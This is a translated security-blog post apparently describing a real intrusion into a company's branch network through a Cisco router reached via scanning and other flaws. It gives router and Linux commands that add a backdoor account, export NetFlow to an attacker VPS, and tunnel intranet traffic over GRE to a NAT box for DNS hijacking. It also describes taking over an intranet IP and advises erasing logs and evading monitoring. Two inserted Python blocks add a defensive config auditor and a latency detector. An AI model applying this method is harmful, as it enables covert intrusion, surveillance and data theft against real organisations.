Aquaboutic | Focus Security Research | Vulnerability Exploit | POC


Using a compromised router to enter the intranet

Posted by ulberg at 2020-03-21

0x01 Controlling the router

Only Cisco routers are covered here, but the methods are not Cisco-specific; they apply just as well to Huawei and Juniper.

There is no elegant way to do this. We obtained a number of routers through distributed scanning combined with other vulnerabilities, which gave us enough of them to test on.

We chose a Cisco C800 series small business router (a very old one).

Figure 1 router version

Once in, first check the logs and the login and authentication configuration.

Figure 2 router login and other related information

There is an ACL restricting logins, which I had removed earlier; that is how the Telnet password was found. AAA authentication is not enabled, so there is no authentication server, only local authentication. No log server is configured, and not even SNMP is configured (I wanted to leave an SNMP back door, but that does not seem to be an option here).

Quickly add an account and password, harden the router, and patch the vulnerability.

Figure 3 adding a privileged account

0x02 Network topology analysis

After these basic steps, save a complete copy of the configuration (it cannot be pasted here in full) and analyze the basic network architecture.

In brief, this is a small branch office of the company. It reaches the Internet through PPPoE and NAT, has one public IP address and an internal network of 10.xx.xx.0/24, and connects to headquarters through a GRE tunnel, behind which lies a much larger internal network.

This layout is the most common one: a public address obtained by dialing up to the ISP, with the intranet machines behind NAT. Company networks in which every host has a public IP address are very rare.

Figure 4 network topology

0x03 Preparing to enter the intranet

Intranet machines reach Google through NAT, and the same NAT shields the intranet. We control router R1, which sits at the edge of the internal network, and we also have a public VPS running Ubuntu 12.04. R2 stands for the many routers we do not control.

More information is needed before penetrating the intranet, so we add a second public VPS (win2008r) and set up a traffic monitoring server on it to analyze the intranet's daily traffic and behaviour.

The Win2008 box is the NetFlow collector. NetFlow is configured on R1 so that intranet traffic information can be observed. There are many NetFlow collectors on the Internet; SolarWinds is the best, supports SQL Server 2005 and can store a large amount of data, but I found no cracked version of it. ManageEngine, which I use, has cracked versions everywhere.

NetFlow configuration (the collector address is omitted by the author and shown in angle brackets):

    ip flow-export source Ethernet0
    ip flow-export destination <collector IP address> 8888
    ip flow-export version 5
    ……

Figure 6 overview of the target network's traffic

Figure 7 flow classification diagram

After tallying the web traffic I tried to open the pages, but none of them would open: they all return 404 Not Found or a certificate error, so we cannot see which sites are being visited. Google keeps no search records for us to look at, so we can only glance at Bing for the same sites, and the results are still very few.

To find out more about the intranet (the company's name, which websites the employees log on to, which software is in common use) we first have to hijack DNS. Because the network environment is poor, with a NAT making the network too complex, we do not use transparent hijacking mode but gateway hijacking mode.

The two terms are defined as follows:

Transparent hijacking mode: a term of my own. The source and destination IP addresses of the packet are not modified; only the packet's data and checksum are. Neither users nor servers notice anything, so it is completely transparent, and apart from adding some delay it cannot be detected by antivirus software, firewalls or IPS.

Gateway hijacking mode: as the name implies, act as a gateway, routing and NATing the traffic that passes through me so that it still travels normally on the Internet. This has a large impact; Gmail, for example, will warn you that you have logged in from another location.

One rule about hijacking (my own summary): behind a firewall or NAT, wherever you take the traffic from, you must send the packets (both the hijacked packets and the returned ones) back to that same point.

Here is the explanation. Hijacking GRE tunnel traffic behind NAT Internet access is very troublesome. An outgoing packet first enters the GRE tunnel, becoming a GRE packet, and then passes through NAT as a GRE packet. That is, NAT acts only on the GRE packets and records their state; it does not NAT the packets encapsulated inside the GRE. Consequently a packet injected from outside cannot pass back through the NAT. The same reasoning applies to firewalls.

Because our programming ability is limited, we decided on gateway hijacking mode.

Set up a GRE tunnel between R1's public-network port and eth0 on my Linux box.

Linux IP address:

Router public IP address:

R1 configuration (addresses omitted by the author are shown in angle brackets):

    en
    conf t
    int tunnel 1
    tunnel source e0                  (interface name; an interface IP address also works, but causes problems)
    tunnel destination <Linux IP address>
    ip address <tunnel address>
    end

Ubuntu configuration, setting up the GRE tunnel:

    # modprobe ip_gre
    # lsmod | grep ip_gre
    # ip tunnel add gre1 mode gre remote <router public IP address> local <Linux IP address> ttl 255
    # ip link set gre1 up
    # ip addr add <local tunnel address> peer <remote tunnel address> dev gre1

Ping the far-end IP address from both ends of the tunnel; it should be reachable.

Then enable IP forwarding.

Set /proc/sys/net/ipv4/ip_forward to 1 (takes effect immediately, but is lost after a reboot).

Edit /etc/sysctl.conf so that packet forwarding is enabled at boot:

    net.ipv4.ip_forward = 1    (remove the # in front of this line)

Enable NAT with iptables.

The 192 address is the address to be NATed and the 202 address is the existing public IP address. The rule takes effect as soon as it is entered, but is lost after a reboot.

Save the iptables rules:

#service iptables save

Add the intranet route (the network is omitted by the author):

    route add -net <intranet /8 network> dev gre1

Everything under that /8 goes out via gre1; in other words, all of those networks take the GRE tunnel.

Then we use our own software to extract the DNS data, which is not convenient to post.

The traffic also contains Telnet, SSH and the like, but they cannot be hijacked: the destination addresses are restricted by an ACL and my Linux box cannot reach them, so they cannot be used directly.
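From the defender's side, the gaps this router showed (no AAA, no log server, no SNMP) and the traces the method leaves in the running-config (an extra Tunnel interface, NetFlow exported to an outside host) are all visible in a configuration audit. The following is an added example, not code from the post; the config text, the addresses and the approved-peer list are constructed for illustration.

```python
"""Audit a Cisco IOS running-config for the gaps and artifacts discussed in the
post: AAA missing, no remote syslog host, no SNMP, Tunnel interfaces to an
unapproved peer, and NetFlow export to a host outside the intranet."""
import ipaddress
import re

INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed config. Tunnel0 is the legitimate GRE link to headquarters;
# Tunnel1 and the flow-export destination point at an outside host.
SAMPLE_CONFIG = """\
interface Tunnel0
 ip address 172.16.1.1 255.255.255.252
 tunnel source Dialer1
 tunnel destination 203.0.113.10
!
interface Tunnel1
 tunnel source Ethernet0
 tunnel destination 198.51.100.7
!
ip flow-export source Ethernet0
ip flow-export version 5
ip flow-export destination 198.51.100.7 8888
"""

def audit(config, approved_peers):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    if not re.search(r"^aaa new-model", config, re.M):
        findings.append("AAA not enabled: only local/line passwords protect logins")
    if not re.search(r"^logging (host )?\d", config, re.M):
        findings.append("no remote syslog host: logs can be cleared on the box")
    if not re.search(r"^snmp-server ", config, re.M):
        findings.append("SNMP not configured: no polling or trap visibility")
    # Each Tunnel interface with its indented body (lines that start with a space)
    for m in re.finditer(r"^interface (Tunnel\d+)\n((?: .*\n)*)", config, re.M):
        dest = re.search(r"tunnel destination (\S+)", m.group(2))
        peer = dest.group(1) if dest else "unset"
        if peer not in approved_peers:
            findings.append(f"{m.group(1)}: tunnel to unapproved peer {peer}")
    for m in re.finditer(r"^ip flow-export destination (\S+) (\d+)", config, re.M):
        addr = ipaddress.ip_address(m.group(1))
        if not any(addr in net for net in INTERNAL_NETS):
            findings.append(f"NetFlow exported outside the intranet to {addr}:{m.group(2)}")
    return findings
```

Running `audit(SAMPLE_CONFIG, {"203.0.113.10"})` yields five findings: the three hardening gaps, Tunnel1, and the external NetFlow collector.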

0x04 Entering the intranet

The traffic alone does not get me into the intranet, so I have to enter it myself.

Forcibly hijack a legitimate but unused IP address in the intranet and assign it to yourself by connecting to OpenVPN on the Linux box. All that remains is to add a host route for that address on the router and a default route to 10.xx.xx.xx/8 on Linux, and my workstation is in the intranet (without any VPN-style restrictions; its access rights are equivalent to the router's).

How you get your own workstation into the intranet is entirely up to you; there are too many methods, because at this point the Ubuntu box is already inside the intranet. The OpenVPN configuration and the route additions will not be posted; there is plenty about them on the web.

Figure 8 verifying the connectivity of Ubuntu to the intranet

Entering the intranet this way has the following advantages:

All of your traffic is treated as intranet traffic by the intranet's traffic devices. On an intranet with somewhat heavy traffic you can download files freely without worrying about alarms for excessive traffic. (theory, not tested)

Hide well on the router, avoid the NetFlow monitoring, remove the logs, and erase all of the memory before leaving; your activity then cannot be traced within the intranet. (theory, not done)

If the address hijack is chosen well, it bypasses the login restriction (a layer-3 restriction) of the intranet servers.

With good timing it can create the illusion that an intranet employee downloaded a large number of files from the file server. (theory, not done)


The drawback is that the packets are not encrypted, which is annoying: they are essentially in the clear. If there is no security device beyond the router, or a direct IPsec tunnel is used instead, this amounts to no drawback at all.

In conclusion, it is highly covert, far more so than a VPN, a trojan and the like. Even the log server can be ignored.

The subject of this post is entering the internal network, not internal network penetration; no research on intranet penetration is done here.

All sensitive information has been modified and erased.

0x05 Afterword

Some smaller points

Link delay gets a lot of attention, so a few more words on it. Take my hijacked Google traffic as an example: my box sits close to Google, near the far end of the intranet's path to Google.

The average delay from my box to Google is 0.617 ms.

Figure 9 Ubuntu to Google delay

The average delay from the router to the Linux box is 256 ms, while the average delay when the router pings Google directly is 180 ms.

Figure 10 screenshot of the router's network delay

The Linux box processes the hijacked data, and the software delay of modifying packets is about 5 ms, so the delay after hijacking should be about 260 ms.

However, after hijacking the delay to the target is 248 ms, which is less than 256 ms + 0.6 ms + 5 ms. Why that is, I cannot explain.

Overall the delay increased by about one third over the 180 ms, roughly 60 ms.

We discussed delay at length earlier: increasing the delay by one third has a more noticeable impact, and is easily detected and can trigger an alarm. Personally I think everyone sees delays to Baidu that are 500 ms or 1 s higher than usual; at most, after checking the IP address and looking at a tracert, Baidu's operations staff will scold the carriers. Ordinary network users do not even suspect the carrier; they just think their own computer is slow. Perhaps someone will suspect that they are being hijacked.
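Whether a one-third increase is noticed depends on whether anyone compares against a baseline. The following detector, an added example and not the post's code, flags a sustained shift in median RTT and ignores single spikes; the samples are constructed around the figures above (about 180 ms direct, about 248 ms after rerouting), and the 25% threshold and five-sample run are assumptions.

```python
"""Flag a sustained RTT increase over a baseline, as a defender watching the
branch's path to a reference host might. A lone spike does not trigger."""
from statistics import median

BASELINE_MS = [178, 181, 179, 183, 180, 177, 182, 180, 179, 181]   # constructed
REROUTED_MS = [247, 250, 246, 249, 251, 248, 247, 252, 246, 248]   # constructed

def shift_ratio(baseline, window):
    """Fractional change of the window's median RTT over the baseline median."""
    return median(window) / median(baseline) - 1.0

def first_sustained_shift(baseline, samples, threshold=0.25, run=5):
    """Index at which `run` consecutive samples first all exceed the baseline
    median by more than `threshold`, or -1 if that never happens. The streak
    resets whenever a sample drops back under the limit, so a single
    transient spike is not reported."""
    limit = median(baseline) * (1.0 + threshold)
    streak = 0
    for i, rtt in enumerate(samples):
        streak = streak + 1 if rtt > limit else 0
        if streak == run:
            return i - run + 1
    return -1

def demo():
    # Baseline, one transient spike, two normal samples, then the rerouted path.
    observed = BASELINE_MS + [300, 179, 181] + REROUTED_MS
    return first_sustained_shift(BASELINE_MS, observed), shift_ratio(BASELINE_MS, REROUTED_MS)
```

`demo()` reports the shift starting at sample 13 (the first rerouted sample) with a ratio of about 0.38, while the spike at sample 10 is skipped.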

The router studied here is a network boundary router with at least one public IP address. When the router or layer-3 switch sits inside the intranet, the question is whether hijacking can still be used. The approach is to build a layer-7 application-layer tunnel (GRE is a layer-3 network-layer tunnel) that goes out through the intranet just as our personal computers do, or to establish a connection directly to a server in the intranet and hijack the data there (verified, but only in a public-network test where the far end was a public Cisco 2911 router; no server has been tried, and development capacity is limited).

To penetrate the intranet you need an application-layer VPN such as IPsec VPN or EZVPN (I tested these two; other VPNs above layer 3 are in theory feasible). The configuration is much more complex than a GRE tunnel, but the principle is very simple to understand; the configuration cannot be covered here. In theory an IPsec VPN should be able to establish a connection to the IPsec VPN server; I have not succeeded yet but am still studying it at the theoretical level. EZVPN is Cisco proprietary, and a server cannot be built on Windows or Linux.

As for persistence, extending intranet persistence or a router back door through the router is far better than a trojan. Apart from the NSA and FireEye, nobody has dealt with router back doors. Few people can even configure routers, let alone reverse-check them.

As for traffic hijacking software, there is plenty of it on the Internet, but in practice none of it can be used directly once you find it, especially in transparent hijacking mode; mitmproxy and the others all fall short. Everyone says so, and in actual testing they turn out to be suited only to developers debugging their software, so you can only develop your own, but development ability is limited.

I hope readers can recommend efficient software that can handle large traffic volumes (such as BGP hijacking).